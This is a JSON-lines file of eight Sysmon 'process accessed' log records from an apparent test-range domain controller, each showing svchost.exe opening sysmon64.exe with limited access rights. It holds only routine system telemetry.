{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1514,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.297\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.297","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1515,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.297\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.297","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1516,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.297\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.297","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1517,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.297\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.297","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1518,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.297\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.297","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1519,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.297\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.297","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1520,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.297\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.297","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1521,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.297\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.297","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
